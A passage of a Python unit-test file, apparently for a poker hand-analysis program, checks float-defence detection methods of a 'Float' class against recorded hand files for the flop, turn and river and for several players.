self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XBC__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_def_opp(), msg=file + ' ' + strt + ' ' + plr)
def test_enum_float_def(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in0gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual('call', tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCC__T__XXBFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual('call', tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XBRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual('fold', tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__BRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual('fold', tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XBC__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_def(),
msg=file + ' ' + strt + ' ' + plr)
def test_float_raise_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in0gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
